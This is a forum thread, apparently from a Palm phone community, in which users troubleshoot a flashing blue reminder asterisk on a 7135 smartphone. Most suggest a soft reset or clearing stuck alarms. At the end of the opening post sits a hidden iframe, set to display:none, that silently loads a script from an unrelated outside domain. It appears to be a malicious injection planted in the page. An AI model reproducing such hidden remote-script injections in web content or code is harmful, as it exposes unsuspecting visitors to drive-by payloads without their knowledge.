+ Reply to Thread

Flashing blue asterisk?

I seem to be getting some sort of alert/reminder on my phone, but only when it's in the Palm functions.

There is a flashing blue asterisk or star in the top left corner of the screen superimposing itself over whatever function name is usually there. I can't find anything about it anywhere, there is nothing in my datebook or to-do list that ought to generate it, and when I click on it I get a half-second of a screen that says "reminder" at the top, has an unchecked box midway down with no description next to it, and "clear all" and "snooze" buttons on the bottom. The screen returns to whatever the function and wont acknowledge my tries to click on any of the above buttons.:dunno<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

It means you hit snooze for an alarm. one you respond to the alarm after the snooze it goes away.
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

That's the problem: what alarm? Like I said, I've gone though all the calendar, to-do list and phone message screen options and can't seem to find the one that activated this.

And I dont recall ever seeing the word "snooze" on any screen before, let alone hitting it in response to an alarm.

The funny thing is if you search on "snooze" in here, you get a bunch of threads about people wishing they had alarm functions, and that they had to download freeware programs with "snooze" functions. I seem to have them already.

Originally posted by Nownownow
    That's the problem: what alarm? Like I said, I've gone though all the calendar, to-do list and phone message screen options and can't seem to find the one that activated this.

And I dont recall ever seeing the word "snooze" on any screen before, let alone hitting it in response to an alarm.

The funny thing is if you search on "snooze" in here, you get a bunch of threads about people wishing they had alarm functions, and that they had to download freeware programs with "snooze" functions. I seem to have them already.
    It will also come up if you simply ignore an alarm (snooze by default). Next to the unchecked box is supposed to be the description of the reminder. If you check the checkbox, it will tell the system you have responded to the alarm and go away....

Alan

Originally posted by alanb
    It will also come up if you simply ignore an alarm (snooze by default). Next to the unchecked box is supposed to be the description of the reminder. If you check the checkbox, it will tell the system you have responded to the alarm and go away....

Alan
    As I said, it only shows that screen for half a second.

You cant even see what it says unless you're looking in the right spot(s) before they show up and then you can just get a flash before it returns to the previous screen. I had to hit the asterisk and flash the screen several times just to be able to read all(?) the things that were on that screen.

It will not let me check or uncheck the box.

There is nothing next to the unchecked box, just empty screen.

How do I make this thing go away?

As I said, it only shows that screen for half a second.

You cant even see what it says unless you're looking in the right spot(s) before they show up and then you can just get a flash before it returns to the previous screen. I had to hit the asterisk and flash the screen several times just to be able to read all(?) the things that were on that screen.

It will not let me check or uncheck the box.

There is nothing next to the unchecked box, just empty screen.

How do I make this thing go away?
    I would start with a soft reset, and if that doesn't do it, I am afraid it may be hard reset time.... Looks like your phone got confused...

Alan

Sounds like a datebook issue of somekind-- have you installed any kinds of HACKS or datebook apps that might be conflicting with the internal datebook/alerts?

Did your last datebook sync finish completely? Are you using a third party conduit for syncing the datebook? if so is it outdated or incompatable?

Good luck! I hope it goes away!
    iPhone therefore iAm.

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

SAME PROBLEM

I had the same issue and i solved it once by tappind the astriks at it flashed, and the other time with a soft reset
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

thanks

I haven't done any hacks or loaded any other software files to this phone other than mp3s and pics (and those were all through the 7135's own software, not a Cruzer).
    All hotsyncs appeared normal, even did one sync after the blinking started (I hope this means it wont keep "giving it back" to the phone). Looks like soft reset time...

Set an alarm and when it goes off, hit the snooze. When it comes back again, hit the "clear all" button and that should get rid of anything still waiting to be cleared.

That is all I can think of to solve it besides what has been mentioned already.

That sounds like a good idea Beryl.. If it is a stubborn alert snoozing that would take care of it.
    iPhone therefore iAm.

Originally posted by Beryl
    Set an alarm and when it goes off, hit the snooze. When it comes back again, hit the "clear all" button and that should get rid of anything still waiting to be cleared.

That is all I can think of to solve it besides what has been mentioned already.
    I like that. If it happens again, I'll try it. The soft reset took care of it this time.

Re: Flashing blue asterisk?

I seem to be getting some sort of alert/reminder on my phone, but only when it's in the Palm functions.

There is a flashing blue asterisk or star in the top left corner of the screen superimposing itself over whatever function name is usually there. I can't find anything about it anywhere, there is nothing in my datebook or to-do list that ought to generate it, and when I click on it I get a half-second of a screen that says "reminder" at the top, has an unchecked box midway down with no description next to it, and "clear all" and "snooze" buttons on the bottom. The screen returns to whatever the function and wont acknowledge my tries to click on any of the above buttons.:dunno
    Sure glad this thread was still around. I got that annoying flashing blue "reminder" asterisk exactly as NowNowNow described. I thought I would post to the thread to bring it to top incase anyone else gets this....

In my case it seems to be associated with trying to clear a SMS page I recieved. I thought I choose the correct option to clear the message but got the flashing blue asterisk and no way of clearing it. I wasn't able to find any access to the "reminder" screen either. A soft reset cleared the indicator.
    mg

Yup. I had this on both my old and new 7135.

Whenever an alert comes up in the future, you must clear it, not ignore it. The fix is a soft reset if you don't.

Same thing happened to me. Soft reset was the only thing that cleared it.

gkw

possible cause??

I just went through the soft reset to fix mine and the only thing I can think of that may have caused it is that I replicated my phone to two separate computers. This always has caused issues with the desktop as long as I can remember. In my case, there are always phantom one character appointments ("a", 12/31/1970) that get created.

I suspect that some sort of replication artifact is creating this bogus Alert because I have never used alerts and they are disabled in my Palm desktop.

Anyway, soft reset works for now...

GW
    Palm fan since Pilot 1000

Re: possible cause??

Originally posted by gkw
    In my case, there are always phantom one character appointments ("a", 12/31/1970) that get created.
    Do you use Datebk5? I think that entry is related to its registration. It has not caused me a problem but occasionally it shows up as a hotsync message.

gkw

datebook version?

I use the standard Palm desktop that came with the phone. I am at V4.1. Is there a newer version?
    Palm fan since Pilot 1000